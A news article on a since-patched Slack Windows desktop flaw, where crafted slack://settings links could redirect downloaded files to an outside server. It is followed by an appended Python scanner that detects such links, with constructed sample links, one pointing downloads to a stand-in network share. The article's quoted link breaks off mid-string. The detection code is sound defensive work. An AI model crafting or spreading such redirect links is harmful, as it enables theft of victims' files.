A security researcher has uncovered a flaw in Slack that could have been exploited to steal files sent over the business messaging app and potentially spread malware.
The flaw involves Slack's Windows desktop app and the way it can automatically save downloaded files to a chosen destination, whether a folder on your PC or an online storage server. You can set a download location in the app's preferences section. However, David Wells, a researcher at the security firm Tenable, noticed there is another way to configure the option: via a special link.
"Crafting a link like 'slack://settings/?update={ 'PrefSSBFileDownloadPath':
Wells realized the same function could be abused. Imagine a hacker using such links to secretly reconfigure a Slack desktop app to send all downloaded files to an outside server. "Using this attack vector, an insider could exploit this vulnerability for corporate espionage, manipulation, or to gain access to documents outside of their purview," Wells' security firm Tenable said in a separate report.
The vulnerability can also pave the way for malware infections. Any downloaded files sent to the hacker-controlled server can be altered and booby-trapped with malicious code. The attack will commence once the victim opens the file on the Slack desktop app.
The main obstacle to carrying out this attack is circulating the hacker-created links to people on Slack, which keeps its channels private to paying clients and their companies. To get around this, Wells noticed that Slack channels can be configured to subscribe to RSS feeds, including threads on Reddit.
"I could make a post to a very popular Reddit community that Slack users around the world are subscribed to," Wells said. The hacker-created link will then populate inside the Slack channel and possibly attract some clicks.
"This technique could be unmasked by savvy Slack users, however if decades of phishing campaigns have taught us anything, it's that users click links, and when leveraged through an untrusted RSS feed, the impact can get much more interesting," he added.
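As an added illustration (this code is not from the article, Slack or Tenable), here is a defender-side scanner that inspects message or RSS text for `slack://settings/?update=` links rewriting the `PrefSSBFileDownloadPath` preference named above, and marks whether the new path would send downloads off the host. The sample feed items are constructed, and the JSON-in-query encoding and single-quote normalisation are assumptions about the link format.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Preference key named in the Tenable quote above (assumed JSON-in-query encoding).
DOWNLOAD_PATH_KEY = "PrefSSBFileDownloadPath"
SLACK_SETTINGS_LINK = re.compile(r"slack://settings/\?[^\s<>]+", re.IGNORECASE)

# Constructed feed text for testing; these are not real Reddit posts or links.
SAMPLE_FEED = """\
Item 1: Weekly roundup https://example.com/article
Item 2: try this slack://settings/?update=%7B%22PrefSSBFileDownloadPath%22%3A%22%5C%5C%5C%5Cexample-share%5C%5Cdownloads%22%7D
Item 3: slack://settings/?update=%7B%22PrefSSBFileDownloadPath%22%3A%22C%3A%5C%5CUsers%5C%5Cme%5C%5CDownloads%22%7D
"""


def parse_settings_update(link: str) -> dict:
    """Return the settings a slack://settings/?update=... link would apply.

    parse_qs already percent-decodes the value. Single-quoted JSON-like text,
    as in the snippet quoted in the article, is normalised to double quotes
    (assumption: paths containing apostrophes are not handled)."""
    raw = parse_qs(urlsplit(link).query).get("update", [""])[0]
    for candidate in (raw, raw.replace("'", '"')):
        try:
            parsed = json.loads(candidate)
            return parsed if isinstance(parsed, dict) else {}
        except json.JSONDecodeError:
            continue
    return {}


def is_remote_path(path: str) -> bool:
    """True when the download location would leave the host: a UNC share or a URL."""
    p = path.strip()
    return p.startswith(("\\\\", "//")) or bool(re.match(r"^[a-z][a-z0-9+.-]*://", p, re.I))


def flag_download_redirects(text: str) -> list:
    """Scan message/RSS text and report every link that rewrites the download path,
    marking whether the new path points off-host (the corporate-espionage case)."""
    hits = []
    for link in SLACK_SETTINGS_LINK.findall(text):
        path = parse_settings_update(link).get(DOWNLOAD_PATH_KEY)
        if isinstance(path, str):
            hits.append({"link": link, "path": path, "remote": is_remote_path(path)})
    return hits
```

Running `flag_download_redirects(SAMPLE_FEED)` flags item 2 as a remote (UNC) redirect and item 3 as a local-path change, while the ordinary HTTPS link in item 1 is ignored.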
Slack has patched the flaw in version 3.4.0 of the Windows desktop app. "We investigated and found no indication that this vulnerability was ever utilized, nor reports that our users were impacted," the company said in an email.